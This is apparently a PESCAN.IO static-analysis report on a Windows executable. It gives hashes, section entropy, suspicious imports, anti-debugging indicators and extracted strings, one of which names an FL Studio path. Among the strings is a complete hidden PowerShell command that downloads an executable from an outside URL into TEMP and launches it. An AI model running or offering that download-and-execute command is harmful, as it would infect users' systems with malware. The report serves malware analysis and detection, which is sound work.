PREMIUM PESCAN.IO - Analysis Report

File Structure
[Analysis image not included in this export]
PE chart colour code: executable header (light blue), executable sections (pink), non-executable sections (black), external injected code (red). A file structure drawn in red indicates a malformed or corrupted header.
Chart code for other (non-PE) files: printable characters (blue), non-printable characters (black).

Information
Size: 284,00 KB
SHA-256 Hash: 29F483E4931773693ADA4CE1A1ED1BDCE9A4DF4664771F72D62A5395894A7FFA
SHA-1 Hash: DBD2474D50C8C1E630FDDAC4E64BB6F8E21BB166
MD5 Hash: 5A12B7B7AE0B0038D6D699C83405AD72
Imphash: 97D2D684309CF7A1244A9CA45A0086E2
MajorOSVersion: 6
MinorOSVersion: 0
CheckSum: 00000000
EntryPoint (rva): 4D98
SizeOfHeaders: 400
SizeOfImage: 4C000
ImageBase: 0000000140000000
Architecture: x64
ImportTable: 46234
IAT: 6000
Characteristics: 22
TimeDateStamp: 692FA672
Date: 03/12/2025 2:54:42
File Type: EXE
Number Of Sections: 6
ASLR: Disabled
Section Names (Optional Header): .text, .rdata, .data, .pdata, .rsrc, .reloc
Number Of Executable Sections: 1
Subsystem: Windows GUI
UAC Execution Level Manifest: requireAdministrator

Sections Info
Section  Flags                                              ROffset  RSize  VOffset  VSize  Entropy  Chi2
.text    60000020 (Code, Executable, Readable)              400      4C00   1000     4BE5   6,3056   151113,26
.rdata   40000040 (Initialized Data, Readable)              5000     41400  6000     412A6  7,7808   271157,68
.data    C0000040 (Initialized Data, Readable, Writeable)   46400    200    48000    818    2,9511   47003,00
.pdata   40000040 (Initialized Data, Readable)              46600    600    49000    420    3,4353   143411,33
.rsrc    40000040 (Initialized Data, Readable)              46C00    200    4A000    1E8    4,7681   8288,00
.reloc   42000040 (Initialized Data, GP-Relative, Readable) 46E00    200    4B000    88     1,6391   83057,00
Binder/Joiner/Crypter
2 Executable files found

Entry Point
Section number 1 (.text) contains the Entry Point
Information -> EntryPoint (calculated file offset) - 4198
Code -> 4883EC28E8130400004883C428E97AFEFFFFCCCC40534883EC20488BD933C9FF1503130000488BCBFF154A130000FF153C13
SUB RSP, 0X28
CALL 0X141C
ADD RSP, 0X28
JMP 0XE8C
INT3
INT3
PUSH RBX
SUB RSP, 0X20
MOV RBX, RCX
XOR ECX, ECX
CALL QWORD PTR [RIP + 0X1303]
MOV RCX, RBX
CALL QWORD PTR [RIP + 0X134A]

Signatures
Rich Signature Analyzer:
Code -> 137E0A54571F6407571F6407571F64075E67F7075B1F6407D0966706531F6407D09660065D1F6407D09661064E1F6407D0966506511F6407239E6506581F6407571F6507DB1F6407C6966D06561F6407C6969B07561F6407C6966606561F640752696368571F6407
Footprint md5 Hash -> 695CEA25ABCE53173C2E09A58FC55A5E
• The Rich header apparently has not been modified
Certificate - Digital Signature Not Found:
• The file is not signed

Packer/Compiler
Detect It Easy (die)
PE+(64): compiler: Microsoft Visual C/C++(-)[-]
PE+(64): linker: Microsoft Linker(14.44**)[-]
Entropy: 7.70431

Suspicious Functions
Library Function Description
KERNEL32.DLL VirtualAlloc Reserve, commit, or both, a region of memory within the virtual address space of a process.
KERNEL32.DLL GetModuleHandleA Retrieves a handle to the specified module.
KERNEL32.DLL LoadLibraryA Loads the specified module into the address space of the calling process.
KERNEL32.DLL GetProcAddress Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).
KERNEL32.DLL IsDebuggerPresent Determines if the calling process is being debugged by a user-mode debugger.
Windows REG (UNICODE)
System\Core.dll

File Access
TEMP\BK598146.exe
start /min cmd.exe
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
VCRUNTIME140.dll
VCRUNTIME140_1.dll
MSIMG32.dll
gdiplus.dll
COMCTL32.dll
MSVCP140.dll
ole32.dll
GDI32.dll
USER32.dll
KERNEL32.dll
api-ms-win-crt-utility-l1-1-0.dll
WININET.dll
.dat
@.dat
hSoTjMPgKZmtpimvUjLW012.txt
Temp

File Access (UNICODE)
ProgramFiles

Words of Interest
exec
powershell
start
shutdown
systeminfo

Words of Interest (UNICODE)
Virus

URLs
https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt

PE Carving
Start Offset  Header  End Offset  Size (Bytes)
0                     38520       38520
38520                 47000       EAE0
Strings/Hex Code Found With The File Rules
Rule Type Encoding Matched (Word)
Text Ascii Anti-Analysis VM (IsDebuggerPresent)
Text Ascii Anti-Analysis VM (GetSystemInfo)
Text Ascii Anti-Analysis VM (GlobalMemoryStatusEx)
Text Ascii Stealth (CloseHandle)
Text Ascii Stealth (IsBadReadPtr)
Text Ascii Stealth (VirtualAlloc)
Text Ascii Stealth (VirtualProtect)
Entry Point Hex Pattern Microsoft Visual C++ 8.0 (DLL)
Resources
Path        DataRVA  Size  FileOffset  Code (hex)                                                                                                 Text
\24\1\1033  4A060    188   46C60       3C3F786D6C2076657273696F6E3D27312E302720656E636F64696E673D275554462D3827207374616E64616C6F6E653D2779   <?xml version='1.0' encoding='UTF-8' standalone='y
Intelligent String
• api-ms-win-crt-locale-l1-1-0.dll
• api-ms-win-crt-stdio-l1-1-0.dll
• api-ms-win-crt-math-l1-1-0.dll
• api-ms-win-crt-string-l1-1-0.dll
• api-ms-win-crt-runtime-l1-1-0.dll
• api-ms-win-crt-utility-l1-1-0.dll
• api-ms-win-crt-heap-l1-1-0.dll
• <_register_onexit_function_crt_atexitgterminateapi-ms-win-crt-runtime-l1-1-0.dll
• VCRUNTIME140_1.dll
• MSVCP140.dll
• KERNEL32.dll
• .bss
• string too longstart /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe; Start-Process -FilePath $env:TEMP\BK598146.exe -WindowStyle Hidden }"
• %PROGRAMFILES%\Image-Line\FL Studio 21\System\Core.dll
• kernel32.dll
• COMCTL32.dll
• gdiplus.dll
• MSIMG32.dll
• VCRUNTIME140.dll
• <_register_onexit_function_crt_atexitapi-ms-win-crt-heap-l1-1-0.dll

Flow Anomalies
Offset RVA Section Description
4EB N/A .text CALL QWORD PTR [RIP+0x52EF]
53F N/A .text CALL QWORD PTR [RIP+0x5293]
584 N/A .text CALL QWORD PTR [RIP+0x5166]
5DD N/A .text CALL QWORD PTR [RIP+0x5105]
61F N/A .text JMP QWORD PTR [RIP+0x50C3]
6A4 N/A .text CALL QWORD PTR [RIP+0x5046]
6E4 N/A .text CALL QWORD PTR [RIP+0x5006]
70B N/A .text CALL QWORD PTR [RIP+0x4EAF]
73D N/A .text CALL QWORD PTR [RIP+0x511D]
752 N/A .text CALL QWORD PTR [RIP+0x50D8]
7AA N/A .text CALL QWORD PTR [RIP+0x5098]
7BC N/A .text CALL QWORD PTR [RIP+0x5096]
82D N/A .text CALL QWORD PTR [RIP+0x4D9D]
836 N/A .text CALL QWORD PTR [RIP+0x4D74]
90A N/A .text CALL QWORD PTR [RIP+0x4E90]
953 N/A .text CALL QWORD PTR [RIP+0x4C6F]
A28 N/A .text CALL QWORD PTR [RIP+0x4BA2]
A31 N/A .text CALL QWORD PTR [RIP+0x4B79]
B6A N/A .text CALL QWORD PTR [RIP+0x49C0]
BC5 N/A .text CALL QWORD PTR [RIP+0x4995]
C5D N/A .text CALL QWORD PTR [RIP+0x49BD]
C6C N/A .text CALL QWORD PTR [RIP+0x49AE]
C7E N/A .text CALL QWORD PTR [RIP+0x499C]
C96 N/A .text CALL QWORD PTR [RIP+0x494C]
CAA N/A .text CALL QWORD PTR [RIP+0x4978]
CED N/A .text CALL QWORD PTR [RIP+0x4A7D]
D14 N/A .text CALL QWORD PTR [RIP+0x488E]
D29 N/A .text CALL QWORD PTR [RIP+0x48A9]
D3D N/A .text CALL QWORD PTR [RIP+0x4895]
F7E N/A .text CALL QWORD PTR [RIP+0x4854]
FCA N/A .text CALL QWORD PTR [RIP+0x4618]
FD7 N/A .text CALL QWORD PTR [RIP+0x46CB]
1025 N/A .text CALL QWORD PTR [RIP+0x47AD]
1076 N/A .text CALL QWORD PTR [RIP+0x456C]
1083 N/A .text CALL QWORD PTR [RIP+0x461F]
10D1 N/A .text CALL QWORD PTR [RIP+0x4701]
112F N/A .text CALL QWORD PTR [RIP+0x44B3]
113C N/A .text CALL QWORD PTR [RIP+0x4566]
1142 N/A .text CALL QWORD PTR [RIP+0x4480]
11F0 N/A .text CALL QWORD PTR [RIP+0x43DA]
11F9 N/A .text CALL QWORD PTR [RIP+0x43B1]
1301 N/A .text CALL QWORD PTR [RIP+0x4319]
1387 N/A .text CALL QWORD PTR [RIP+0x444B]
140A N/A .text CALL QWORD PTR [RIP+0x41D8]
1417 N/A .text CALL QWORD PTR [RIP+0x428B]
1469 N/A .text CALL QWORD PTR [RIP+0x4369]
14A6 N/A .text CALL QWORD PTR [RIP+0x413C]
14B3 N/A .text CALL QWORD PTR [RIP+0x41EF]
1505 N/A .text CALL QWORD PTR [RIP+0x42CD]
152E N/A .text JMP QWORD PTR [RIP+0x40D4]
15AA N/A .text CALL QWORD PTR [RIP+0x3F80]
163C N/A .text CALL QWORD PTR [RIP+0x3EBE]
16D8 N/A .text CALL QWORD PTR [RIP+0x3E92]
1749 N/A .text CALL QWORD PTR [RIP+0x3E21]
1987 N/A .text CALL QWORD PTR [RIP+0x3C3B]
1A21 N/A .text CALL QWORD PTR [RIP+0x3BA9]
1A2A N/A .text CALL QWORD PTR [RIP+0x3B80]
1B12 N/A .text CALL QWORD PTR [RIP+0x3A38]
1BB1 N/A .text CALL QWORD PTR [RIP+0x3969]
1CDB N/A .text CALL QWORD PTR [RIP+0x383F]
1CF4 N/A .text CALL QWORD PTR [RIP+0x385E]
1D37 N/A .text CALL QWORD PTR [RIP+0x388B]
1DD1 N/A .text CALL QWORD PTR [RIP+0x37F9]
1DDA N/A .text CALL QWORD PTR [RIP+0x37D0]
1ED5 N/A .text CALL QWORD PTR [RIP+0x36AD]
1FF4 N/A .text CALL QWORD PTR [RIP+0x3506]
206F N/A .text CALL QWORD PTR [RIP+0x3553]
2111 N/A .text CALL QWORD PTR [RIP+0x34B9]
211A N/A .text CALL QWORD PTR [RIP+0x3490]
2215 N/A .text CALL QWORD PTR [RIP+0x330D]
222E N/A .text CALL QWORD PTR [RIP+0x3394]
22D0 N/A .text CALL QWORD PTR [RIP+0x32FA]
22D9 N/A .text CALL QWORD PTR [RIP+0x32D1]
23D8 N/A .text CALL QWORD PTR [RIP+0x319A]
23E8 N/A .text CALL QWORD PTR [RIP+0x314A]
251F N/A .text CALL QWORD PTR [RIP+0x32B3]
2592 N/A .text CALL QWORD PTR [RIP+0x3240]
2604 N/A .text CALL QWORD PTR [RIP+0x308E]
2620 N/A .text CALL QWORD PTR [RIP+0x2DFA]
2634 N/A .text CALL QWORD PTR [RIP+0x2FBE]
263D N/A .text CALL QWORD PTR [RIP+0x2DD5]
2654 N/A .text CALL QWORD PTR [RIP+0x2E1E]
2663 N/A .text CALL QWORD PTR [RIP+0x2DF7]
267E N/A .text CALL QWORD PTR [RIP+0x2DB4]
2693 N/A .text CALL QWORD PTR [RIP+0x2D97]
269F N/A .text CALL QWORD PTR [RIP+0x2DBB]
26A8 N/A .text CALL QWORD PTR [RIP+0x2D6A]
26B4 N/A .text CALL QWORD PTR [RIP+0x2DB6]
26C2 N/A .text CALL QWORD PTR [RIP+0x2D78]
26D2 N/A .text CALL QWORD PTR [RIP+0x2D88]
2722 N/A .text CALL QWORD PTR [RIP+0x2F48]
272D N/A .text CALL QWORD PTR [RIP+0x2D0D]
2785 N/A .text CALL QWORD PTR [RIP+0x2EE5]
2791 N/A .text CALL QWORD PTR [RIP+0x2CC9]
27A9 N/A .text CALL QWORD PTR [RIP+0x2C71]
27BC N/A .text CALL QWORD PTR [RIP+0x2E36]
27C5 N/A .text CALL QWORD PTR [RIP+0x2C4D]
27DC N/A .text CALL QWORD PTR [RIP+0x2C76]
2800 N/A .text CALL QWORD PTR [RIP+0x2C5A]
2824 N/A .text CALL QWORD PTR [RIP+0x2C56]
Extra Analysis
Metric Value Percentage
Ascii Code 187755 64,5614%
Null Byte Code 22314 7,6729%
© 2026 All rights reserved.